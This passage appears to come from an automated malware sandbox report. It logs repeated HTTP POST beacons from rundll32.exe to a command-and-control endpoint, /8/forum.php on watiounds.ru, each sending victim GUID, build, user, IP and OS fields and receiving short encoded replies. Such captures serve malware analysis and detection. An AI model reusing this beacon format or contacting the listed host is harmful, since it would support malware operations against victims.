                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:56.247766972 CEST261INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHBYSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          203192.168.2.224936895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:56.568721056 CEST262OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:56.693118095 CEST263INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFMNUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          204192.168.2.224936995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:57.005903006 CEST263OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:57.128365993 CEST264INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMJQNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          205192.168.2.224937095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:57.440504074 CEST264OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:57.562568903 CEST265INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBYBYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          206192.168.2.224937195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:57.876368046 CEST266OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:57.998512030 CEST266INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          207192.168.2.224937295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:58.314071894 CEST267OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:58.437741041 CEST267INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKTGPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          208192.168.2.224937395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:58.760061026 CEST268OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:58.889681101 CEST268INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 5a 41 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJZAQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          209192.168.2.224937495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:59.206846952 CEST269OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:59.330724955 CEST269INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          21192.168.2.224918695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:32.824532032 CEST58OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:32.948359013 CEST59INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          210192.168.2.224937595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:59.654381037 CEST270OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:59.782692909 CEST270INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          211192.168.2.224937695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:00.097728968 CEST271OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:00.221044064 CEST271INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 51 4a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNQJMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          212192.168.2.224937795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:00.547456980 CEST272OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:00.670063019 CEST273INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMTGNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          213192.168.2.224937895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:00.989937067 CEST273OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:01.112196922 CEST274INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVYBEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          214192.168.2.224937995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:01.437752962 CEST275OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:01.566643953 CEST275INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4a 51 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTJQGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          215192.168.2.224938095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:01.904135942 CEST276OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:02.033128023 CEST276INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          216192.168.2.224938195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:02.376682043 CEST277OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:02.516799927 CEST277INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          217192.168.2.224938295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:02.843700886 CEST278OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:02.969145060 CEST278INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZGTAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          218192.168.2.224938395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:03.296247005 CEST279OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:03.419274092 CEST279INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMVENARRABw==0


